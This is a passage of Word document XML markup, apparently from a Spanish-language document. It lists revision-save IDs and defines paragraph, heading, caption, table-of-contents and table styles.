    <w:rsid w:val="00712089"/>
    <w:rsid w:val="007133C9"/>
    <w:rsid w:val="00715745"/>
    <w:rsid w:val="0071789C"/>
    <w:rsid w:val="00721BD8"/>
    <w:rsid w:val="0072227B"/>
    <w:rsid w:val="00724560"/>
    <w:rsid w:val="0072517C"/>
    <w:rsid w:val="00731371"/>
    <w:rsid w:val="00734915"/>
    <w:rsid w:val="00736F07"/>
    <w:rsid w:val="0074185B"/>
    <w:rsid w:val="00742818"/>
    <w:rsid w:val="00742B07"/>
    <w:rsid w:val="00747BA5"/>
    <w:rsid w:val="0075192E"/>
    <w:rsid w:val="007520D6"/>
    <w:rsid w:val="007522E5"/>
    <w:rsid w:val="00755C9E"/>
    <w:rsid w:val="00760A74"/>
    <w:rsid w:val="00761382"/>
    <w:rsid w:val="00764E5D"/>
    <w:rsid w:val="007675C6"/>
    <w:rsid w:val="0078196F"/>
    <w:rsid w:val="00790D83"/>
    <w:rsid w:val="00790EB4"/>
    <w:rsid w:val="0079122A"/>
    <w:rsid w:val="007933F7"/>
    <w:rsid w:val="007A237E"/>
    <w:rsid w:val="007A6B36"/>
    <w:rsid w:val="007C206C"/>
    <w:rsid w:val="007C5684"/>
    <w:rsid w:val="007D6BF8"/>
    <w:rsid w:val="007D7783"/>
    <w:rsid w:val="007E050F"/>
    <w:rsid w:val="007E2128"/>
    <w:rsid w:val="007E4513"/>
    <w:rsid w:val="007E6411"/>
    <w:rsid w:val="007E660C"/>
    <w:rsid w:val="007F0A48"/>
    <w:rsid w:val="007F38E4"/>
    <w:rsid w:val="007F5B6A"/>
    <w:rsid w:val="00800CB8"/>
    <w:rsid w:val="00802C3A"/>
    <w:rsid w:val="0080715E"/>
    <w:rsid w:val="0082495F"/>
    <w:rsid w:val="008251DD"/>
    <w:rsid w:val="008311B5"/>
    <w:rsid w:val="0085090D"/>
    <w:rsid w:val="00850F64"/>
    <w:rsid w:val="00857687"/>
    <w:rsid w:val="0086428D"/>
    <w:rsid w:val="008723AE"/>
    <w:rsid w:val="008731D1"/>
    <w:rsid w:val="00873D54"/>
    <w:rsid w:val="00880390"/>
    <w:rsid w:val="00880473"/>
    <w:rsid w:val="00887612"/>
    <w:rsid w:val="00890B46"/>
    <w:rsid w:val="00890BA2"/>
    <w:rsid w:val="00890BF8"/>
    <w:rsid w:val="008924EA"/>
    <w:rsid w:val="0089277A"/>
    <w:rsid w:val="00895DA4"/>
    <w:rsid w:val="00895F68"/>
    <w:rsid w:val="00896FED"/>
    <w:rsid w:val="008A15A6"/>
    <w:rsid w:val="008A21FC"/>
    <w:rsid w:val="008A41E2"/>
    <w:rsid w:val="008A66D1"/>
    <w:rsid w:val="008B0234"/>
    <w:rsid w:val="008B0E6F"/>
    <w:rsid w:val="008B1CFA"/>
    <w:rsid w:val="008B383D"/>
    <w:rsid w:val="008B58DE"/>
    <w:rsid w:val="008C0FAE"/>
    <w:rsid w:val="008C3100"/>
    <w:rsid w:val="008C3F34"/>
    <w:rsid w:val="008C4855"/>
    <w:rsid w:val="008D2AC4"/>
    <w:rsid w:val="008D2BFC"/>
    <w:rsid w:val="008D5C6A"/>
    <w:rsid w:val="008E1212"/>
    <w:rsid w:val="008E4695"/>
    <w:rsid w:val="008F5FE9"/>
    <w:rsid w:val="008F7B0D"/>
    <w:rsid w:val="0090177F"/>
    <w:rsid w:val="00904A7E"/>
    <w:rsid w:val="00911865"/>
    <w:rsid w:val="00911B74"/>
    <w:rsid w:val="00912EEA"/>
    <w:rsid w:val="00915672"/>
    <w:rsid w:val="0093106F"/>
    <w:rsid w:val="009310DE"/>
    <w:rsid w:val="00933B1A"/>
    <w:rsid w:val="009368E2"/>
    <w:rsid w:val="00937C12"/>
    <w:rsid w:val="00940363"/>
    <w:rsid w:val="00945DD8"/>
    <w:rsid w:val="00945F2A"/>
    <w:rsid w:val="00953875"/>
    <w:rsid w:val="00964563"/>
    <w:rsid w:val="00965FCC"/>
    <w:rsid w:val="00966575"/>
    <w:rsid w:val="0097057D"/>
    <w:rsid w:val="009709C4"/>
    <w:rsid w:val="00971C81"/>
    <w:rsid w:val="00971DD5"/>
    <w:rsid w:val="009728E6"/>
    <w:rsid w:val="00975C97"/>
    <w:rsid w:val="00976F72"/>
    <w:rsid w:val="00977053"/>
    <w:rsid w:val="00977D14"/>
    <w:rsid w:val="009809FF"/>
    <w:rsid w:val="0099165C"/>
    <w:rsid w:val="009A28D9"/>
    <w:rsid w:val="009A50D7"/>
    <w:rsid w:val="009A54A3"/>
    <w:rsid w:val="009A59BF"/>
    <w:rsid w:val="009A5B09"/>
    <w:rsid w:val="009A6C26"/>
    <w:rsid w:val="009A7E19"/>
    <w:rsid w:val="009B1F20"/>
    <w:rsid w:val="009C3DA2"/>
    <w:rsid w:val="009D3B09"/>
    <w:rsid w:val="009E5376"/>
    <w:rsid w:val="009E53AE"/>
    <w:rsid w:val="009F00B5"/>
    <w:rsid w:val="009F3F7F"/>
    <w:rsid w:val="009F75B0"/>
    <w:rsid w:val="00A02393"/>
    <w:rsid w:val="00A02AB4"/>
    <w:rsid w:val="00A06438"/>
    <w:rsid w:val="00A101BD"/>
    <w:rsid w:val="00A1160A"/>
    <w:rsid w:val="00A22D00"/>
    <w:rsid w:val="00A24F6E"/>
    <w:rsid w:val="00A258FF"/>
    <w:rsid w:val="00A26D7E"/>
    <w:rsid w:val="00A26DD4"/>
    <w:rsid w:val="00A319D8"/>
    <w:rsid w:val="00A345FD"/>
    <w:rsid w:val="00A355A8"/>
    <w:rsid w:val="00A3694B"/>
    <w:rsid w:val="00A406EB"/>
    <w:rsid w:val="00A419F5"/>
    <w:rsid w:val="00A5030D"/>
    <w:rsid w:val="00A5240F"/>
    <w:rsid w:val="00A54886"/>
    <w:rsid w:val="00A5499E"/>
    <w:rsid w:val="00A67755"/>
    <w:rsid w:val="00A70863"/>
    <w:rsid w:val="00A71184"/>
    <w:rsid w:val="00A7153D"/>
    <w:rsid w:val="00A80574"/>
    <w:rsid w:val="00A82D38"/>
    <w:rsid w:val="00A93737"/>
    <w:rsid w:val="00A95E09"/>
    <w:rsid w:val="00AA14EE"/>
    <w:rsid w:val="00AA50A1"/>
    <w:rsid w:val="00AB48BC"/>
    <w:rsid w:val="00AB525B"/>
    <w:rsid w:val="00AB55F9"/>
    <w:rsid w:val="00AB6551"/>
    <w:rsid w:val="00AC25C3"/>
    <w:rsid w:val="00AD15D0"/>
    <w:rsid w:val="00AD1843"/>
    <w:rsid w:val="00AD2341"/>
    <w:rsid w:val="00AD27A3"/>
    <w:rsid w:val="00AD47D5"/>
    <w:rsid w:val="00AE1910"/>
    <w:rsid w:val="00AE40E4"/>
    <w:rsid w:val="00AE771E"/>
    <w:rsid w:val="00AF30FD"/>
    <w:rsid w:val="00AF34D9"/>
    <w:rsid w:val="00AF5616"/>
    <w:rsid w:val="00AF5A50"/>
    <w:rsid w:val="00AF7A8D"/>
    <w:rsid w:val="00B14147"/>
    <w:rsid w:val="00B17260"/>
    <w:rsid w:val="00B17368"/>
    <w:rsid w:val="00B17FBB"/>
    <w:rsid w:val="00B3184A"/>
    <w:rsid w:val="00B31DA8"/>
    <w:rsid w:val="00B4214A"/>
    <w:rsid w:val="00B43DA0"/>
    <w:rsid w:val="00B45FCD"/>
    <w:rsid w:val="00B50EAF"/>
    <w:rsid w:val="00B52327"/>
    <w:rsid w:val="00B55E21"/>
    <w:rsid w:val="00B638FE"/>
    <w:rsid w:val="00B6541C"/>
    <w:rsid w:val="00B66C54"/>
    <w:rsid w:val="00B811E1"/>
    <w:rsid w:val="00B81335"/>
    <w:rsid w:val="00B90638"/>
    <w:rsid w:val="00B93C71"/>
    <w:rsid w:val="00B95CD1"/>
    <w:rsid w:val="00B95E84"/>
    <w:rsid w:val="00B96471"/>
    <w:rsid w:val="00BA6B7F"/>
    <w:rsid w:val="00BB30DC"/>
    <w:rsid w:val="00BB6F0B"/>
    <w:rsid w:val="00BC44D7"/>
    <w:rsid w:val="00BD3071"/>
    <w:rsid w:val="00BD5F4E"/>
    <w:rsid w:val="00BD6084"/>
    <w:rsid w:val="00BD7FBB"/>
    <w:rsid w:val="00BE3402"/>
    <w:rsid w:val="00BE6646"/>
    <w:rsid w:val="00BF2EBF"/>
    <w:rsid w:val="00C01876"/>
    <w:rsid w:val="00C02100"/>
    <w:rsid w:val="00C104E0"/>
    <w:rsid w:val="00C131F2"/>
    <w:rsid w:val="00C14521"/>
    <w:rsid w:val="00C167DB"/>
    <w:rsid w:val="00C25E12"/>
    <w:rsid w:val="00C2730E"/>
    <w:rsid w:val="00C31777"/>
    <w:rsid w:val="00C31CBA"/>
    <w:rsid w:val="00C32E2D"/>
    <w:rsid w:val="00C3383F"/>
    <w:rsid w:val="00C33CC4"/>
    <w:rsid w:val="00C36E8B"/>
    <w:rsid w:val="00C44870"/>
    <w:rsid w:val="00C452E0"/>
    <w:rsid w:val="00C53646"/>
    <w:rsid w:val="00C53B83"/>
    <w:rsid w:val="00C54231"/>
    <w:rsid w:val="00C54B09"/>
    <w:rsid w:val="00C612F3"/>
    <w:rsid w:val="00C62FB1"/>
    <w:rsid w:val="00C64A6E"/>
    <w:rsid w:val="00C67C6E"/>
    <w:rsid w:val="00C7006E"/>
    <w:rsid w:val="00C72A0C"/>
    <w:rsid w:val="00C77BEA"/>
    <w:rsid w:val="00C8131C"/>
    <w:rsid w:val="00C829E5"/>
    <w:rsid w:val="00C8370B"/>
    <w:rsid w:val="00C84298"/>
    <w:rsid w:val="00C85A3F"/>
    <w:rsid w:val="00C86F82"/>
    <w:rsid w:val="00C92316"/>
    <w:rsid w:val="00C9236E"/>
    <w:rsid w:val="00C93120"/>
    <w:rsid w:val="00C94EA3"/>
    <w:rsid w:val="00CB3A13"/>
    <w:rsid w:val="00CC5D8F"/>
    <w:rsid w:val="00CD2B34"/>
    <w:rsid w:val="00CD3CB1"/>
    <w:rsid w:val="00CD7200"/>
    <w:rsid w:val="00CE55FF"/>
    <w:rsid w:val="00CF3810"/>
    <w:rsid w:val="00CF58C5"/>
    <w:rsid w:val="00CF7339"/>
    <w:rsid w:val="00D00508"/>
    <w:rsid w:val="00D007BD"/>
    <w:rsid w:val="00D01488"/>
    <w:rsid w:val="00D019BE"/>
    <w:rsid w:val="00D01B74"/>
    <w:rsid w:val="00D028BF"/>
    <w:rsid w:val="00D04988"/>
    <w:rsid w:val="00D11633"/>
    <w:rsid w:val="00D120D2"/>
    <w:rsid w:val="00D16257"/>
    <w:rsid w:val="00D168BF"/>
    <w:rsid w:val="00D16A82"/>
    <w:rsid w:val="00D24EDA"/>
    <w:rsid w:val="00D27FEB"/>
    <w:rsid w:val="00D31662"/>
    <w:rsid w:val="00D35E34"/>
    <w:rsid w:val="00D37CC0"/>
    <w:rsid w:val="00D40EEB"/>
    <w:rsid w:val="00D4368C"/>
    <w:rsid w:val="00D479CA"/>
    <w:rsid w:val="00D47EC8"/>
    <w:rsid w:val="00D50176"/>
    <w:rsid w:val="00D50DDA"/>
    <w:rsid w:val="00D52435"/>
    <w:rsid w:val="00D52612"/>
    <w:rsid w:val="00D61892"/>
    <w:rsid w:val="00D703F6"/>
    <w:rsid w:val="00D74C3F"/>
    <w:rsid w:val="00D75284"/>
    <w:rsid w:val="00D7662B"/>
    <w:rsid w:val="00D80B95"/>
    <w:rsid w:val="00D8239F"/>
    <w:rsid w:val="00D84583"/>
    <w:rsid w:val="00D84859"/>
    <w:rsid w:val="00D85B62"/>
    <w:rsid w:val="00D86C8E"/>
    <w:rsid w:val="00D873D9"/>
    <w:rsid w:val="00D95B80"/>
    <w:rsid w:val="00DA02C8"/>
    <w:rsid w:val="00DA067C"/>
    <w:rsid w:val="00DA6710"/>
    <w:rsid w:val="00DB1213"/>
    <w:rsid w:val="00DB3366"/>
    <w:rsid w:val="00DB527D"/>
    <w:rsid w:val="00DB541E"/>
    <w:rsid w:val="00DC1023"/>
    <w:rsid w:val="00DD13F3"/>
    <w:rsid w:val="00DD5A9F"/>
    <w:rsid w:val="00DD5D11"/>
    <w:rsid w:val="00DD6C07"/>
    <w:rsid w:val="00DE1A76"/>
    <w:rsid w:val="00DE29E2"/>
    <w:rsid w:val="00DE43E0"/>
    <w:rsid w:val="00DE44FB"/>
    <w:rsid w:val="00DE74BD"/>
    <w:rsid w:val="00E0233C"/>
    <w:rsid w:val="00E12933"/>
    <w:rsid w:val="00E162E1"/>
    <w:rsid w:val="00E1772A"/>
    <w:rsid w:val="00E22EDD"/>
    <w:rsid w:val="00E24AC7"/>
    <w:rsid w:val="00E26E45"/>
    <w:rsid w:val="00E27D96"/>
    <w:rsid w:val="00E50E76"/>
    <w:rsid w:val="00E54DF2"/>
    <w:rsid w:val="00E56E14"/>
    <w:rsid w:val="00E622F7"/>
    <w:rsid w:val="00E6316C"/>
    <w:rsid w:val="00E6387F"/>
    <w:rsid w:val="00E63CB9"/>
    <w:rsid w:val="00E656D3"/>
    <w:rsid w:val="00E6602B"/>
    <w:rsid w:val="00E709C8"/>
    <w:rsid w:val="00E71805"/>
    <w:rsid w:val="00E72E03"/>
    <w:rsid w:val="00E74383"/>
    <w:rsid w:val="00E74ACA"/>
    <w:rsid w:val="00E75C54"/>
    <w:rsid w:val="00E8145F"/>
    <w:rsid w:val="00E82741"/>
    <w:rsid w:val="00E86835"/>
    <w:rsid w:val="00E86B65"/>
    <w:rsid w:val="00E91376"/>
    <w:rsid w:val="00E979E1"/>
    <w:rsid w:val="00EA5379"/>
    <w:rsid w:val="00EB2C3A"/>
    <w:rsid w:val="00EB64BD"/>
    <w:rsid w:val="00EC0A1B"/>
    <w:rsid w:val="00EC359C"/>
    <w:rsid w:val="00EC38A0"/>
    <w:rsid w:val="00ED16E1"/>
    <w:rsid w:val="00EE1277"/>
    <w:rsid w:val="00EE2022"/>
    <w:rsid w:val="00EE385A"/>
    <w:rsid w:val="00EE435E"/>
    <w:rsid w:val="00EE4762"/>
    <w:rsid w:val="00EE4CF0"/>
    <w:rsid w:val="00EE6517"/>
    <w:rsid w:val="00EE7ACA"/>
    <w:rsid w:val="00EF3950"/>
    <w:rsid w:val="00EF5696"/>
    <w:rsid w:val="00EF56CF"/>
    <w:rsid w:val="00F01205"/>
    <w:rsid w:val="00F023A5"/>
    <w:rsid w:val="00F0571F"/>
    <w:rsid w:val="00F10413"/>
    <w:rsid w:val="00F16AC2"/>
    <w:rsid w:val="00F211D9"/>
    <w:rsid w:val="00F21ABC"/>
    <w:rsid w:val="00F35C08"/>
    <w:rsid w:val="00F36248"/>
    <w:rsid w:val="00F37854"/>
    <w:rsid w:val="00F40079"/>
    <w:rsid w:val="00F40C56"/>
    <w:rsid w:val="00F40E58"/>
    <w:rsid w:val="00F44373"/>
    <w:rsid w:val="00F50132"/>
    <w:rsid w:val="00F5747C"/>
    <w:rsid w:val="00F64A4E"/>
    <w:rsid w:val="00F64AB3"/>
    <w:rsid w:val="00F731BA"/>
    <w:rsid w:val="00F7769F"/>
    <w:rsid w:val="00F77FE1"/>
    <w:rsid w:val="00F821FC"/>
    <w:rsid w:val="00F8261B"/>
    <w:rsid w:val="00F862EA"/>
    <w:rsid w:val="00F87C69"/>
    <w:rsid w:val="00F87DA9"/>
    <w:rsid w:val="00F94763"/>
    <w:rsid w:val="00F95B0C"/>
    <w:rsid w:val="00F96C33"/>
    <w:rsid w:val="00FA3E6B"/>
    <w:rsid w:val="00FA5D79"/>
    <w:rsid w:val="00FB1705"/>
    <w:rsid w:val="00FB375C"/>
    <w:rsid w:val="00FB3F81"/>
    <w:rsid w:val="00FC1B73"/>
    <w:rsid w:val="00FC1FD9"/>
    <w:rsid w:val="00FD163F"/>
    <w:rsid w:val="00FD2E47"/>
    <w:rsid w:val="00FD4463"/>
    <w:rsid w:val="00FD4666"/>
    <w:rsid w:val="00FD4D46"/>
    <w:rsid w:val="00FF1BEA"/>
    <w:rsid w:val="00FF416F"/>
    <w:rsid w:val="00FF41F2"/>
    <w:rsid w:val="00FF4CE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FCD60FF-68A3-484A-8E91-173E6E607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C4A6C"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo1Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="005F373E"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="480"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="es-MX"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo2Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B14147"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo3Car"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B14147"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBid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F373E"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="es-MX"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo2Car">
    <w:name w:val="Título 2 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B14147"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Puesto">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="PuestoCar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00D50176"/>
    <w:pPr>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PuestoCar">
    <w:name w:val="Puesto Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Puesto"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00D50176"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Estilo1">
    <w:name w:val="Estilo1"/>
    <w:basedOn w:val="Prrafodelista"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="006A045E"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri"/>
      <w:b/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D84583"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Estilo2">
    <w:name w:val="Estilo2"/>
    <w:basedOn w:val="Prrafodelista"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00CF3810"/>
    <w:pPr>
      <w:ind w:left="0"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo3Car">
    <w:name w:val="Título 3 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B14147"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Descripcin">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00035BB2"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sinespaciado">
    <w:name w:val="No Spacing"/>
    <w:qFormat/>
    <w:rsid w:val="0036169D"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="tgc">
    <w:name w:val="_tgc"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="0036169D"/>
  </w:style>
  <w:style w:type="table" w:styleId="Tablaconcuadrcula">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="005643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5643F2"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliografa">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A70863"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TtulodeTDC">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Ttulo1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00A70863"/>
    <w:pPr>
      <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A70863"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A70863"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A70863"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Encabezado">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EncabezadoCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C02100"/>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C02100"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C02100"/>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C02100"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Tabladecuadrcula4-nfasis5">
    <w:name w:val="Grid Table 4 Accent 5"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="005C2329"/>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Tabladecuadrcula4-nfasis11">
    <w:name w:val="Tabla de cuadrícula 4 - Énfasis 11"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:next w:val="Tabladecuadrcula4-nfasis1"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00D16A82"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="es-MX"/>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customStyle="1" w:styleId="Tabladecuadrcula4-nfasis31">
    <w:name w:val="Tabla de cuadrícula 4 - Énfasis 31"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:next w:val="Tabladecuadrcula4-nfasis3"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00D16A82"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="es-MX"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>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Pr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>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Pr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:sz="4" w:space="0" w:color="9BBB59"/>
        </w:tcBorders>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table" w:customStyle="1" w:styleId="Tabladecuadrcula4-nfasis51">
    <w:name w:val="Tabla de cuadrícula 4 - Énfasis 51"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:next w:val="Tabladecuadrcula4-nfasis5"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00D16A82"/>
    <w:pPr>
